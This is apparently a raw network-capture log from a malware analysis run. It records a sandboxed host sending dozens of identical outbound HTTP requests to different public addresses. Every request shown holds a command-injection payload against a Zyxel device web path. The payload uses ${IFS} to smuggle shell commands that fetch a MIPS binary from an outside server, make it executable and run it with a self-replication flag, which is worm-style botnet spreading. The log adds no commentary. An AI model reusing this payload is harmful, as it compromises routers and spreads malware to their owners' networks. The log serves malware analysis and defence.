                                            Jan 14, 2024 15:50:43.490597963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5398192.168.2.2333214130.218.234.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490621090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5399192.168.2.2350520126.67.112.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490657091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5400192.168.2.2351166203.27.104.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490684032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5401192.168.2.2342736146.84.229.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490711927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5402192.168.2.2336320217.44.223.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490744114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5403192.168.2.2345106198.198.129.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490770102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5404192.168.2.235437058.24.109.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490802050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5405192.168.2.2350524157.186.108.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490854025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5406192.168.2.235852271.6.210.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490868092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5407192.168.2.235389663.103.96.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490906000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5408192.168.2.2337654206.204.255.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490931988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5409192.168.2.234867299.55.125.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490966082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5410192.168.2.2350836205.63.123.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.490997076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5411192.168.2.235643280.130.239.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491036892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5412192.168.2.2345464137.106.27.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491055012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5413192.168.2.2335094167.224.148.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491079092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5414192.168.2.2359676133.85.130.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491126060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5415192.168.2.235599649.144.36.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491173983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5416192.168.2.234594687.205.39.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491177082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5417192.168.2.235307049.12.92.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491225958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5418192.168.2.235781698.238.87.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491249084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5419192.168.2.236024695.190.86.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491307020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5420192.168.2.2350844164.101.103.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491334915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5421192.168.2.2343562187.138.14.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491369009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5422192.168.2.233596278.241.139.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491400003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5423192.168.2.2349050202.143.91.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491420984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5424192.168.2.2337486139.184.58.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491436958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5425192.168.2.23601425.254.245.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491475105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5426192.168.2.234891262.128.132.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491491079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5427192.168.2.2352950204.74.147.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491524935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5428192.168.2.2338424119.24.189.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491549015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5429192.168.2.2339108157.31.97.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491580963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5430192.168.2.2350816189.188.144.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491595030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5431192.168.2.2358108110.161.177.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491642952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5432192.168.2.2333300179.231.137.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491645098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5433192.168.2.2358444107.27.16.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491671085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5434192.168.2.2337870201.67.92.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491712093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5435192.168.2.2359344103.224.190.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491729975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5436192.168.2.23510504.185.245.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491782904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5437192.168.2.23424685.8.157.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491801977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5438192.168.2.2357510161.248.104.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491858006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5439192.168.2.2352678141.8.8.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491878986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5440192.168.2.235865499.50.109.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491920948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5441192.168.2.2344782155.91.42.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491950035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5442192.168.2.233478472.6.183.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491955042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5443192.168.2.233461086.108.229.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.491970062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5444192.168.2.235123098.246.69.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492010117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5445192.168.2.2349280137.249.59.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492027998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5446192.168.2.235093896.28.160.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492063999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5447192.168.2.2345310206.249.172.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492113113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5448192.168.2.234343081.154.32.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492162943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5449192.168.2.234338879.21.198.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492172003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5450192.168.2.2341228158.73.121.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492211103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5451192.168.2.234248078.254.213.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492228031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5452192.168.2.234814443.116.103.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492255926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5453192.168.2.236091225.191.159.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492311001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5454192.168.2.2341536180.57.3.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492321014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5455192.168.2.2349956117.147.37.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492341042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5456192.168.2.235350098.104.164.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492366076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5457192.168.2.2334728118.136.202.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492424011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5458192.168.2.2360278141.103.34.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492441893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5459192.168.2.2351582212.134.235.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492463112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5460192.168.2.2355602223.183.78.177443
                                            TimestampBytes transferredDirectionData
